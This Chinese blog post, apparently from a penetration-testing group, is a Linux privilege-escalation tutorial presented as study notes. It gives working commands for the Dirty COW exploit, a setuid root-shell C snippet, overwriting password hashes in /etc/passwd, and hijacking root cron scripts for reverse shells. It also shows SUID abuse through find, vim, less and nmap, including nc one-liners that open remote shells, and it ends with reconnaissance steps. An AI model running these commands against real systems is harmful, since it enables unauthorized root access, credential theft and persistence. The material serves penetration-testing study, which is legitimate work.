vlambda博客
学习文章列表

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

读取敏感文件（配置文件、密码文件），获得敏感信息（账户密码、用户数据），为进一步权限维持做准备（避免管理员修复你进来的漏洞入口，完成相关权限维持也就多了一次再进来的机会）

目标系统有了shell，但可能是个普通用户，并不是root权限，而且也读不了啥敏感文件比如shadow

才疏学浅，本着学习的心向各位前辈进行学习，这边就先放了一些常用思路，其他一些linux权限基础、linux提权的信息收集补充在的文末，大佬们可自行翻阅。

两个辅助检测脚本，这边检测出了脏牛
https://github.com/mzet-/linux-exploit-suggester
https://github.com/jondonas/linux-exploit-suggester-2

注意：
避免首先运行任何提权exp！！！目标机器可能会崩溃，公开的许多攻击都不稳定，可能会有rootshell但是系统随后会崩溃......
更多姿势可见Github：
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/lucyoa/kernel-exploits
https://github.com/xairy/kernel-exploits
以脏牛提权为案例：
利用工具：

https://codeload.github.com/FireFart/dirtycow/zip/master
原权限，shadow是读不到的：

使用编译后的exp进行提权，这边会新建了个账户：
[test@testyang ~]$ gcc -pthread dirty.c -o dirty -lcrypt
[test@testyang ~]$ ./dirty 111111
可读取shadow文件：

低内核提权
前提：目标目录具有777权限

上图主要流程思路：
进入/tmp创建exploit目录，查看ping命令权限，创建文件硬链接并查看权限，将文件加载入内存并查看状态，删除文件后查看状态，创建一个c语言代码，gcc编译后即可获得权限
使用的C语言代码：
void __attribute__((constructor)) init() { 

    setuid(0); system("/bin/bash");

}

明文root密码权限：

linux系统的密码大部分都和/etc/passwd和/etc/shadow这两个配置文件息息相关，passwd里面储存了用户，shadow里面是密码的hash，正常情况下shadow是仅root可读写的
/etc/passwd文件：

passwd由冒号分割，第一列是用户名，第二列是密码，x代表密码hash被放在shadow里面了（这样非root就看不到了），而shadow里面最重要的就是密码的hash
/etc/shadow文件：

如果passwd可写，我们就可以把root的密码字段替换成一个已知密码的hash（比如本地虚拟机shadow里面的已知的root密码的hash），这样系统在验证密码时以passwd的为准，密码就已知了
如果shadow可读，直接获得root账户hash用john进行解密即可，和词典有关，感觉大部分时候解不出来..........

攻击以root权限运行的服务：

查看root用户运行的服务

修改配置文件，添加相应内容

提权后效果如下，成功读到shadow文件：

默认这些程序以root权限执行，如果有幸遇到一个把其中脚本配置成任意用户可写的管理员，我们就可以修改脚本等回连rootshell了
假设root调用某个脚本/tmp/te.py每分钟进行执行，非root账户对能够对文件如下修改，直接写了个反弹shell：

查看运行日志，确保每分钟都在运行了..

nc监听收到反弹shell如下

SUID提权：

SUID代表“执⾏时设置⽤⼾ID”，具有该标志位的⽂件在执⾏时，运行的uid变为属主⾝份，其实就是如果⼀个程序属主是root，并具有suid标志位，其他用户运行时uid会临时变为root
查看原权限

赋予s的权限（chmod u+s）后查看新创建文件的权限

已知常见的可用来提权的linux可行性的文件列表如下：

nmap
vim
find
bash
more
less
nano
cp

除此之外，还可以通过发现系统上运行的所有SUID可执行文件进行进一步利用：
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
查看具有root用户权限的suid文件并利用，利用nmap，这边用的是个老版本的nmap：

输入反弹shell命令如下：

其他利用举例，环境暂时没加权限，可自行琢磨尝试

Find：

touch test
find test -exec whoami \;
find test -exec bash -p \;
find test -exec /bin/sh \;
find test -exec nc -e /bin/sh IP 端口 \;
find test -exec netcat -lvp 端口 -e /bin/sh \;

vim:

编辑/etc/shadow 或者进入vim后启动sh交互
:set shell=/bin/sh
:shell
也可以vim -c '!sh

bash:

bash -p

less:

less /etc/passwd
!/bin/sh

More:

more /home/pelle/myfile
!/bin/bash

劫持环境变量提权:

感觉也可以做成权限维持，通过低权限用户登录上主机调用相关命令获得rootshell:
当前位于/home/bee/testt内编写一个c程序调用系统二进制文件的函数，调用ps命令：

使用gcc编译.c的文件并提升suid权限：
gcc demo.c -o dede

低权限用户查找suid权限，发现我们制作的文件：

进入相关目录发现之前生成的文件并运行：

结合echo：

结合copy：

同理读取文件如下

补充内容:

都是一些基础知识整理，感觉一些信息收集的点还是挺有用的，大佬们可以选择性翻阅

Linux权限介绍：

Linux操作系统对多用户的管理，是非常繁琐的，所以用组的概念来管理用户就变得简单，每个用户可以在一个独立的组，每个组也可以有零个用户或者多个用户
用户是根据用户ID来识别的，默认ID长度为32位，从默认ID编号从0开始，但是为了和老式系统兼容，用户ID限制在60000以下，Linux用户分总共分为三种，分别如下：
root用户 ID 0
系统用户ID 1-499
普通用户ID 500以上
Linux系统中的每个文件或者文件夹，都有一个所属用户及所属组，使用id命令可以显示当前用户的信息，root账户为0，这里的普通用户为1000

Linux操作系统用户的特点如下：

每个用户拥有一个UserID，操作系统实际读取的是UID，而非用户名；
每个用户属于一个主组，属于一个或多个附属组，一个用户最多有31个附属组；
每个组拥有一个GroupID；
每个进程以一个用户身份运行，该用户可对进程拥有资源控制权限；
每个可登陆用户拥有一个指定的Shell环境。

Linux文件权限位：

第一位：代表文件类型，普通文件为-，目录为d，软连接为l，字符设备为c，块文件为b

第一组：文件拥有者的权限，rwx（读写执行），rw（读写），x（执行），以此类推，rwx转换为数字分别对应421，rwx位置不会改变，若无权限则用-替换
第二组：所在组用户的权限，同理如上
第三组，其他用户的的权限，同理如上
数字：若文件为普通文件，表示文件的硬链接（软链接不会增加数字），若文件未目录，表示目录下的子目录数量
第一个root：文件所有者为root
第二个root：文件所在组为root组
一串数字：文件大小
日期：最后的修改日期
最后一列：文件的名字

权限提升前的信息收集:

这里列举部分常见敏感文件路径信息，供学习及参考：
系统版本：

内核版本：

环境变量：

运行服务：

查root权限服务：

查询安装的应用及版本，哪些当前运行：

服务配置，有无错误配置，寻找脆弱项：

查看计划任务：

历史记录查看：

主机上可能有哪些纯文本用户名与密码：

查看网络连接情况：

查看网络配置，与网络中服务器：

敏感文件查看：

日志信息查看：

感谢大佬看到文末，感谢翻阅。

专注渗透测试技术

全球最新网络攻击技术